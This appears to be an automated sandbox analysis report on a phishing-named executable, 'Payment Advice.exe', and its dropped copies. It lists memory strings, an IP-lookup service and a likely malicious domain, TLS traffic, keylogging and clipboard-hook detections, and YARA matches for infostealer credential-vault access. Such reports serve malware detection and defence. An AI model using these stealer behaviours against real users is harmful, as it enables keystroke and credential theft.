                    Source: Payment Advice.exe, 00000000.00000002.1710843743.000000000318F000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 00000009.00000002.1756192021.000000000336F000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4124167230.0000000002891000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000000E.00000002.1849213275.00000000026CF000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.1931578848.0000000002CDD000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000019.00000002.4125631218.0000000002D5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Payment Advice.exe, 00000008.00000002.4124616083.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.000000000309A000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4124167230.000000000292B000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002E1E000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.000000000318E000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002F49000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.000000000309A000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002FF5000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002E67000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000019.00000002.4125631218.00000000030FD000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000019.00000002.4125631218.0000000002FF8000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000019.00000002.4125631218.0000000003247000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://seawaysfreight-bd.com
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: Payment Advice.exe, 00000000.00000002.1718407994.0000000007262000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: Payment Advice.exe, 00000008.00000002.4119763177.000000000101B000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4171500763.0000000006662000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.000000000309A000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4169183072.0000000006281000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4119763177.000000000103D000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4118934244.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4124167230.000000000292B000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4118934244.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4118934244.0000000000C58000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4195658580.0000000009210000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4195658580.0000000009225000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002F49000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4116736214.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4116736214.0000000000E74000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.000000000309A000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002FF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: Payment Advice.exe, 00000008.00000002.4119763177.000000000101B000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4171500763.0000000006662000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.000000000309A000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4169183072.0000000006281000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4119763177.000000000103D000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4118934244.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4124167230.000000000292B000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4118934244.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4118934244.0000000000C58000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4195658580.0000000009210000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4195658580.0000000009225000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002F49000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4116736214.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4116736214.0000000000E74000.00000004.00000020.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.000000000309A000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002FF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: Payment Advice.exe, 00000000.00000002.1712393138.0000000004C49000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 00000009.00000002.1760226964.0000000004E2A000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4115682058.0000000000431000.00000040.00000400.00020000.00000000.sdmp, BjTxJte.exe, 0000000E.00000002.1852266538.00000000041C5000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.1933792023.0000000003CE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: Payment Advice.exe, 00000000.00000002.1712393138.0000000004C49000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000008.00000002.4124616083.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 00000009.00000002.1760226964.0000000004E2A000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4115682058.0000000000431000.00000040.00000400.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4124167230.0000000002891000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000000E.00000002.1852266538.00000000041C5000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000014.00000002.1933792023.0000000003CE4000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000019.00000002.4125631218.0000000002D5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: Payment Advice.exe, 00000008.00000002.4124616083.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4124167230.0000000002891000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: Payment Advice.exe, 00000008.00000002.4124616083.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, sFPEKzHsLkYZIz.exe, 0000000D.00000002.4124167230.0000000002891000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000013.00000002.4125579074.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: Payment Advice.exe, BjTxJte.exe.8.dr, sFPEKzHsLkYZIz.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49735 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49739 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49742 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49750 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.Payment Advice.exe.4c497e8.1.raw.unpack, cPKWk.cs.Net Code: _9Y8jnYI
                    Source: 0.2.Payment Advice.exe.4c84a08.2.raw.unpack, cPKWk.cs.Net Code: _9Y8jnYI
                    Installs a global keyboard hook
                    Source: C:\Users\user\Desktop\Payment Advice.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\Payment Advice.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                    Source: C:\Users\user\Desktop\Payment Advice.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeWindow created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWindow created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWindow created: window name: CLIPBRDWNDCLASS

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.Payment Advice.exe.4c84a08.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 9.2.sFPEKzHsLkYZIz.exe.4e65888.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 9.2.sFPEKzHsLkYZIz.exe.4e2a668.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 20.2.BjTxJte.exe.3ce4260.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Payment Advice.exe.4c497e8.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 14.2.BjTxJte.exe.41c5ac8.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Payment Advice.exe.4c84a08.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 20.2.BjTxJte.exe.3d1f480.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 20.2.BjTxJte.exe.3d1f480.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 9.2.sFPEKzHsLkYZIz.exe.4e65888.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Payment Advice.exe.4c497e8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 14.2.BjTxJte.exe.41c5ac8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 20.2.BjTxJte.exe.3ce4260.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 9.2.sFPEKzHsLkYZIz.exe.4e2a668.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    .NET source code contains very large array initializations
                    Source: 0.2.Payment Advice.exe.8ec0000.8.raw.unpack, SQL.csLarge array initialization: : array initializer size 33608
                    Initial sample is a PE file and has a suspicious name
                    Source: initial sampleStatic PE information: Filename: Payment Advice.exe
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_05C8E0700_2_05C8E070
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_05C8E8F80_2_05C8E8F8
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_05C8D5600_2_05C8D560
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_05C8EDC00_2_05C8EDC0
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_077A43A00_2_077A43A0
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_077A00400_2_077A0040
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_077A40880_2_077A4088
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_077A0EF00_2_077A0EF0
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_077A65600_2_077A6560
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_077AF5480_2_077AF548
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_077AF5380_2_077AF538
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_077AA5180_2_077AA518
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_077A85080_2_077A8508
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_077A52480_2_077A5248
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_077AF1100_2_077AF110
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_077A30080_2_077A3008
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_077A00070_2_077A0007
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_077A1DE00_2_077A1DE0
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_077A1DD00_2_077A1DD0
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_077AECC80_2_077AECC8
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_077A2C980_2_077A2C98
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 8_2_00F841F88_2_00F841F8
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 8_2_00F84AC88_2_00F84AC8
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 8_2_00F8EB818_2_00F8EB81
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 8_2_00F8ADF88_2_00F8ADF8
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 8_2_00F83EB08_2_00F83EB0
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 8_2_00F81A438_2_00F81A43
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 8_2_068E66088_2_068E6608
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 8_2_068EB2508_2_068EB250
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 8_2_068E34808_2_068E3480
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 8_2_068E00408_2_068E0040
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 8_2_068E7D908_2_068E7D90
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 8_2_068EC1B08_2_068EC1B0
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 8_2_068E55C08_2_068E55C0
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 8_2_068E76B08_2_068E76B0
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 8_2_068EE3D08_2_068EE3D0
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 8_2_068E5D108_2_068E5D10
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeCode function: 13_2_00F541F813_2_00F541F8
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeCode function: 13_2_00F54AC813_2_00F54AC8
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeCode function: 13_2_00F5EB4813_2_00F5EB48
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeCode function: 13_2_00F5ADF813_2_00F5ADF8
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeCode function: 13_2_00F53EB013_2_00F53EB0
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeCode function: 13_2_0648660013_2_06486600
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeCode function: 13_2_0648347813_2_06483478
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeCode function: 13_2_06487D8813_2_06487D88
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeCode function: 13_2_064855B813_2_064855B8
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeCode function: 13_2_0648B23813_2_0648B238
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeCode function: 13_2_0648C1A813_2_0648C1A8
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeCode function: 13_2_064876A813_2_064876A8
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeCode function: 13_2_0648275213_2_06482752
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeCode function: 13_2_06485CF713_2_06485CF7
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeCode function: 13_2_0648E3C813_2_0648E3C8
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeCode function: 13_2_0648004013_2_06480040
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeCode function: 13_2_0648000613_2_06480006
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_02272D9014_2_02272D90
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_022728C814_2_022728C8
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06A543A014_2_06A543A0
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06A5408814_2_06A54088
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06A5004014_2_06A50040
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06A50EF014_2_06A50EF0
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06A5F53814_2_06A5F538
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06A5850214_2_06A58502
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06A5850814_2_06A58508
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06A5656014_2_06A56560
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06A5857F14_2_06A5857F
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06A5F54814_2_06A5F548
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06A5655014_2_06A56550
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06A5324014_2_06A53240
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06A5439114_2_06A54391
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06A5000714_2_06A50007
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06A5300814_2_06A53008
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06A5407814_2_06A54078
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06A5F11014_2_06A5F110
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06A50E9B14_2_06A50E9B
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06A52FF814_2_06A52FF8
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06A52C8914_2_06A52C89
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06A52C9814_2_06A52C98
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06A5ECC814_2_06A5ECC8
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06A51DE014_2_06A51DE0
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06A51DD914_2_06A51DD9
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06EE06C914_2_06EE06C9
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06EE06D814_2_06EE06D8
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06EE02A014_2_06EE02A0
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 19_2_012F41F819_2_012F41F8
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 19_2_012F4AC819_2_012F4AC8
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 19_2_012FAD8B19_2_012FAD8B
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 19_2_012F3EB019_2_012F3EB0
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 19_2_0682660819_2_06826608
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 19_2_0682348019_2_06823480
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 19_2_06827D9019_2_06827D90
